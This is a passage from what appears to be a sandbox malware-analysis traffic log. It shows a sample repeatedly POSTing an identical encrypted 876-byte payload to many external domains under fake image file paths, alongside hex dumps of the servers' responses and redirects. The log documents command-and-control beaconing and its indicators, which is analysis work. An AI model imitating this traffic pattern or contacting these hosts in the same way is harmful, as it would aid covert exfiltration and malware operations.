21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23 Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e\|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
2024-09-09 10:07:09 UTC	380	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Mon, 09 Sep 2024 10:07:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.3 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=3846c15c8bd216c772f1d36ac5b4868d; path=/
2024-09-09 10:07:09 UTC	16004	IN	Data Raw: 31 65 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 2d 52 55 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 3c 6c 69 6e Data Ascii: 1e9f<!DOCTYPE html><html lang="ru-RU"> ...<![endif]--><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="http://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' /><lin

Timestamp	Bytes transferred	Direction	Data
2024-09-09 10:07:10 UTC	276	OUT	POST /static/temp/mdjsvnauuvkc.jpg HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 876 Host: magrinya.net
2024-09-09 10:07:10 UTC	876	OUT	Data Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23 Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e\|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
2024-09-09 10:07:11 UTC	350	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Date: Mon, 09 Sep 2024 10:07:11 GMT Server: Apache X-Powered-By: PHP/8.0.30 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://magrinya.net/wp-json/>; rel="https://api.w.org/"
2024-09-09 10:07:11 UTC	16034	IN	Data Raw: 33 63 0d 0a 0a 0a 09 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 39 5d 3e 0a 09 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 39 22 20 0d 0a 33 63 30 0d 0a 6c 61 6e 67 3d 22 65 73 22 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 39 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 73 22 20 64 61 74 61 2d 66 6f 6f 74 65 72 2d 74 68 65 6d 65 3d 64 61 72 6b 20 64 61 74 61 2d 6d 65 6e 75 2d 74 68 65 6d 65 3d 64 61 72 6b 20 64 61 74 61 2d 73 75 62 6d 65 6e 75 2d 74 68 65 6d 65 3d 64 61 72 6b 20 64 61 74 61 2d 70 61 67 65 2d 74 69 74 6c 65 2d 74 68 65 6d 65 3d 64 61 72 6b 20 69 74 65 6d 74 79 70 65 3d 22 Data Ascii: 3c<!DOCTYPE html>...[if IE 9]><html class="no-js ie9" 3c0lang="es"><![endif]-->...[if gt IE 9]>...><html class="no-js" lang="es" data-footer-theme=dark data-menu-theme=dark data-submenu-theme=dark data-page-title-theme=dark itemtype="

Timestamp	Bytes transferred	Direction	Data
2024-09-09 10:07:12 UTC	278	OUT	POST /news/graphic/yooacevq.jpg HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 876 Host: business-basic.de
2024-09-09 10:07:12 UTC	876	OUT	Data Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23 Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e\|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
2024-09-09 10:07:13 UTC	294	IN	HTTP/1.1 200 OK Date: Mon, 09 Sep 2024 10:07:12 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Retry-After: 86400 Upgrade: h2 Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-09-09 10:07:13 UTC	2410	IN	Data Raw: 39 35 65 0d 0a 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4c 53 43 20 2f 20 56 53 20 4b 61 72 74 65 6e 73 68 6f 70 20 69 73 20 75 6e 64 65 72 20 63 6f 6e 73 74 72 75 63 74 69 6f 6e 3c 2f 74 69 74 6c 65 Data Ascii: 95e<html lang="en"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>LSC / VS Kartenshop is under construction</title

Timestamp	Bytes transferred	Direction	Data
2024-09-09 10:07:14 UTC	292	OUT	POST /uploads/assets/xwncifkynx.gif HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 876 Host: afbudsrejserallinclusive.dk
2024-09-09 10:07:14 UTC	876	OUT	Data Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23 Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e\|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
2024-09-09 10:07:14 UTC	542	IN	HTTP/1.1 404 Not Found Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://www.afbudsrejserallinclusive.dk/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked date: Mon, 09 Sep 2024 10:07:14 GMT server: LiteSpeed vary: User-Agent alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-09-09 10:07:14 UTC	6	IN	Data Raw: 38 38 62 38 0d 0a Data Ascii: 88b8

Timestamp	Bytes transferred	Direction	Data
2024-09-09 10:07:15 UTC	272	OUT	POST /news/pics/sovuwxryinfm.png HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 876 Host: m2graph.fr
2024-09-09 10:07:15 UTC	876	OUT	Data Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23 Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e\|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
2024-09-09 10:07:16 UTC	610	IN	HTTP/1.1 301 Moved Permanently Connection: close x-powered-by: PHP/7.4.33 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 x-ua-compatible: IE=edge location: http://m2graph.fr content-length: 223 date: Mon, 09 Sep 2024 10:07:16 GMT server: LiteSpeed platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-09-09 10:07:16 UTC	223	IN	Data Raw: 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 69 6e 64 65 78 3a 20 70 34 30 34 5f 65 78 65 63 6c 75 64 65 5f 6d 65 64 69 61 20 69 6e 20 3c 62 3e 2f 68 6f 6d 65 2f 75 38 38 32 38 39 31 30 37 31 2f 64 6f 6d 61 69 6e 73 2f 6d 32 67 72 61 70 68 2e 66 72 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 61 6c 6c 2d 34 30 34 2d 72 65 64 69 72 65 63 74 2d 74 6f 2d 68 6f 6d 65 70 61 67 65 2f 61 6c 6c 2d 34 30 34 2d 72 65 64 69 72 65 63 74 2d 74 6f 2d 68 6f 6d 65 70 61 67 65 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 39 38 3c 2f 62 3e 3c 62 72 20 2f 3e 0a Data Ascii: <br /><b>Notice</b>: Undefined index: p404_execlude_media in <b>/home/u882891071/domains/m2graph.fr/public_html/wp-content/plugins/all-404-redirect-to-homepage/all-404-redirect-to-homepage.php</b> on line <b>98</b><br />

Timestamp	Bytes transferred	Direction	Data
2024-09-09 10:07:17 UTC	282	OUT	POST /content/images/gv.png HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 876 Host: stanleyqualitysystems.com
2024-09-09 10:07:17 UTC	876	OUT	Data Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23 Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e\|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
2024-09-09 10:07:17 UTC	235	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 09 Sep 2024 10:07:17 GMT Server: Apache Location: https://karnesstanleyhvac.com/content/images/gv.png Content-Length: 259 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-09-09 10:07:17 UTC	259	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6b 61 72 6e 65 73 73 74 61 6e 6c 65 79 68 76 61 63 2e 63 6f 6d 2f 63 6f 6e 74 65 6e 74 2f 69 6d 61 67 65 73 2f 67 76 2e 70 6e 67 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://karnesstanleyhvac.com/content/images/gv.png">here</a>.</p></body></ht

Timestamp	Bytes transferred	Direction	Data
2024-09-09 10:07:17 UTC	216	OUT	GET /content/images/gv.png HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Host: karnesstanleyhvac.com
2024-09-09 10:07:18 UTC	382	IN	HTTP/1.1 404 Not Found Date: Mon, 09 Sep 2024 10:07:17 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://karnesstanleyhvac.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-09-09 10:07:18 UTC	7810	IN	Data Raw: 31 66 31 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 37 20 6c 74 69 65 38 20 6c 74 69 65 39 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 20 69 65 38 20 6c 74 69 65 39 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 37 29 20 7c 20 21 28 49 45 20 38 29 20 20 5d 3e 3c 21 2d 2d 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 Data Ascii: 1f10<!DOCTYPE html>...[if IE 7]><html class="ie ie7 ltie8 ltie9" lang="en-US"><![endif]-->...[if IE 8]><html class="ie ie8 ltie9" lang="en-US"><![endif]-->...[if !(IE 7) \| !(IE 8) ]>...><html lang="en-US">...<![endif]--><head><meta charse
2024-09-09 10:07:18 UTC	148	IN	Data Raw: 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 25 33 41 33 30 30 25 32 43 33 30 30 69 74 61 6c 69 63 25 32 43 72 65 67 75 6c 61 72 25 32 43 69 74 61 6c 69 63 25 32 43 36 30 30 25 32 43 36 30 30 69 74 61 6c 69 63 25 32 43 37 30 30 25 32 43 37 30 30 69 74 61 6c 69 63 25 32 43 38 30 30 25 32 43 38 30 30 69 74 61 6c 69 63 26 23 Data Ascii: href='https://fonts.googleapis.com/css?family=Open+Sans%3A300%2C300italic%2Cregular%2Citalic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic&#
2024-09-09 10:07:18 UTC	2	IN	Data Raw: 0d 0a Data Ascii:

Timestamp	Bytes transferred	Direction	Data
2024-09-09 10:07:18 UTC	272	OUT	POST /content/temp/pg.jpg HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Content-Length: 876 Host: altitudeboise.com
2024-09-09 10:07:18 UTC	876	OUT	Data Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23 Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e\|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
2024-09-09 10:07:19 UTC	1140	IN	HTTP/1.1 302 Found Date: Mon, 09 Sep 2024 10:07:19 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close P3P: CP="This is not a P3P policy! See https://www.clkmg.com for more info." Location: https://altitudetrampolinepark.com X-Permitted-Cross-Domain-Policies: none Access-Control-Allow-Origin: undefined-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Allow-Headers: DNT,X-CustomHeader,Keep-Alive,User-Agent,X-Requested-With,If-Modified-Since,Cache-Control,Content-Type Access-Control-Max-Age: 300 X-CM-FE: httpfe-1 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2xYaewO4Ppw7ufUIXdVhUuqJ9NnFyIBnY8r%2FsBM%2F29w4uMBnWR1OY5xkxniKyQp1MqupyZrZoJRxq1Wso%2FDLUoRVnlE91znDilRuNh6%2B1EuHd7kKmKEEtLF2l4XMqTXRF0PUcA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c065ee00ca26a56-EWR alt-svc: h3=":443"; ma=86400
2024-09-09 10:07:19 UTC	224	IN	Data Raw: 64 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 6c 74 69 74 75 64 65 74 72 61 6d 70 6f 6c 69 6e 65 70 61 72 6b 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: da<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://altitudetrampolinepark.com">here</a>.</p></body></html>
2024-09-09 10:07:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-09-09 10:07:19 UTC	200	OUT	GET / HTTP/1.1 Cache-Control: no-cache Connection: close Pragma: no-cache User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 Host: altitudetrampolinepark.com
2024-09-09 10:07:19 UTC	692	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 09 Sep 2024 10:07:19 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 54 Connection: close location: https://www.altitudetrampolinepark.com/ x-nf-request-id: 01J7B412TXF8Z9BNS8WKCWMNJY CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2XZUU8PLYkg61Rmo8uj%2BYCXsrC1xk%2Fmboo2y3ZcHalyeHNg3QYthu%2FZtHvb6bAmEyFlCU%2BXdlqKw4vxivxBMyij0X3BtGwPDGxFeZZmMKzwuTO608N0M52Hp1DkaLGRb2NSmLJGgR%2Fj1ARxg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c065ee53aa51a1f-EWR alt-svc: h3=":443"; ma=86400
2024-09-09 10:07:19 UTC	54	IN	Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 6c 74 69 74 75 64 65 74 72 61 6d 70 6f 6c 69 6e 65 70 61 72 6b 2e 63 6f 6d 2f Data Ascii: Redirecting to https://www.altitudetrampolinepark.com/

Timestamp	Bytes transferred	Direction	Data
